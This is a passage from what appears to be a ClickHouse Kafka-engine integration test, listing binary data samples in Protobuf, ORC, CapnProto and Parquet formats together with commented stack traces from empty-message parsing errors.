b'\x0d\x08\x01\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x02\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x03\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x04\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x05\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x06\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x07\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x08\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x09\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0a\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0c\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0d\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0e\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01\x0d\x08\x0f\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
b'\x0b\x1a\x02\x41\x4d\x25\x00\x00\x00\x3f\x28\x01',
# ''
# On empty message exception: Attempt to read after eof
# /src/IO/ReadBuffer.h:184: DB::ReadBuffer::throwReadAfterEOF() @ 0x15c9699b in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.h:115: DB::ProtobufReader::SimpleReader::startMessage() @ 0x1df4f828 in /usr/bin/clickhouse
# /src/Formats/ProtobufReader.cpp:1119: DB::ProtobufReader::startMessage() @ 0x1df5356c in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/ProtobufRowInputFormat.cpp:25: DB::ProtobufRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df4cc71 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestMessage'"
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# ''
# On empty message exception: IOError: File size too small, Stack trace (when copying this message, always include the lines below):
# /src/Processors/Formats/Impl/ORCBlockInputFormat.cpp:36: DB::ORCBlockInputFormat::generate() @ 0x1df282a6 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'CapnProto': {
'data_sample': [
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
b'\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x3f\x01\x00\x00\x00\x1a\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00',
# ''
# On empty message exception: Cannot read all data. Bytes read: 0. Bytes expected: 4.
# /src/IO/ReadBuffer.h:157: DB::ReadBuffer::readStrict(char*, unsigned long) @ 0x15c6894d in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:212: DB::CapnProtoRowInputFormat::readMessage() @ 0x1ded1cab in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CapnProtoRowInputFormat.cpp:241: DB::CapnProtoRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1ded205d in /usr/bin/clickhouse
],
'extra_settings': ", kafka_schema='test:TestRecordStruct'"
},
'Parquet' : {
'data_sample': [
b'\x50\x41\x52\x31\x15\x04\x15\x10\x15\x14\x4c\x15\x02\x15\x04\x12\x00\x00\x08\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x02\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x02\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x01\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x02\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x03\x08\x01\x02\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x15\x02\x19\x6c\x35\x00\x18\x06\x73\x63\x68\x65\x6d\x61\x15\x0a\x00\x15\x04\x25\x00\x18\x02\x69\x64\x00\x15\x02\x25\x00\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x25\x18\x4c\xac\x13\x10\x12\x00\x00\x00\x15\x0c\x25\x00\x18\x04\x76\x61\x6c\x31\x25\x00\x4c\x1c\x00\x00\x00\x15\x08\x25\x00\x18\x04\x76\x61\x6c\x32\x00\x15\x02\x25\x00\x18\x04\x76\x61\x6c\x33\x25\x16\x4c\xac\x13\x08\x12\x00\x00\x00\x16\x02\x19\x1c\x19\x5c\x26\xbc\x01\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x02\x16\xac\x01\x16\xb4\x01\x26\x38\x26\x08\x1c\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x00\x00\x00\x00\x00\x00\x00\x00\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x26\xc8\x03\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xfc\x02\x26\xd4\x02\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x26\xa2\x05\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x02\x16\x68\x16\x70\x26\xde\x04\x26\xb2\
x04\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x26\x8a\x07\x1c\x15\x08\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x32\x15\x02\x16\x02\x16\x84\x01\x16\x8c\x01\x26\xa6\x06\x26\xfe\x05\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x26\xfe\x08\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x33\x15\x02\x16\x02\x16\x6c\x16\x74\x26\xb2\x08\x26\x8a\x08\x1c\x36\x00\x28\x04\x01\x00\x00\x00\x18\x04\x01\x00\x00\x00\x00\x00\x00\x16\x98\x05\x16\x02\x00\x28\x22\x70\x61\x72\x71\x75\x65\x74\x2d\x63\x70\x70\x20\x76\x65\x72\x73\x69\x6f\x6e\x20\x31\x2e\x35\x2e\x31\x2d\x53\x4e\x41\x50\x53\x48\x4f\x54\x19\x5c\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x1c\x00\x00\x00\xc4\x01\x00\x00\x50\x41\x52\x31',
b'\x50\x41\x52\x31\x15\x04\x15\xf0\x01\x15\x90\x01\x4c\x15\x1e\x15\x04\x12\x00\x00\x78\x04\x01\x00\x09\x01\x00\x02\x09\x07\x04\x00\x03\x0d\x08\x00\x04\x0d\x08\x00\x05\x0d\x08\x00\x06\x0d\x08\x00\x07\x0d\x08\x00\x08\x0d\x08\x00\x09\x0d\x08\x00\x0a\x0d\x08\x00\x0b\x0d\x08\x00\x0c\x0d\x08\x00\x0d\x0d\x08\x3c\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x15\x00\x15\x14\x15\x18\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x24\x04\x05\x10\x32\x54\x76\x98\xba\xdc\x0e\x26\xca\x02\x1c\x15\x04\x19\x35\x04\x00\x06\x19\x18\x02\x69\x64\x15\x02\x16\x1e\x16\x9e\x03\x16\xc2\x02\x26\xb8\x01\x26\x08\x1c\x18\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x16\x00\x28\x08\x0f\x00\x00\x00\x00\x00\x00\x00\x18\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x00\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xd8\x04\x1c\x15\x02\x19\x35\x04\x00\x06\x19\x18\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x15\x02\x16\x1e\x16\x6c\x16\x74\x26\x8c\x04\x26\xe4\x03\x1c\x36\x00\x28\x04\x00\x00\x00\x00\x18\x04\x00\x00\x00\x00\x00\x00\x00\x15\x04\x15\x0c\x15\x10\x4c\x15\x02\x15\x04\x12\x00\x00\x06\x14\x02\x00\x00\x00\x41\x4d\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x03\x08\x01\x1e\x00\x26\xb2\x06\x1c\x15\x0c\x19\x35\x04\x00\x06\x19\x18\x04\x76\x61\x6c\x31\x15\x02\x16\x1e\x16\x68\x16\x70\x26\xee\x05\x26\xc2\x05\x1c\x36\x00\x28\x02\x41\x4d\x18\x02\x41\x4d\x00\x00\x00\x15\x04\x15\x08\x15\x0c\x4c\x15\x02\x15\x04\x12\x00\x00\x04\x0c\x00\x00\x00\x3f\x15\x00\x15\x06\x15\x0a\x2c\x15\x1e\x15\x04\x15\x06\x15\x06\x1c\x18\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x16\x00\x28\x04\x00\x00\x00\x3f\x18\x04\x00\x00\x00\x3f\x00\x00\x00\x03\x08\x01\x1e\x00\x26\x9a\x08\x1c\x15\x08\x19\x35\x04\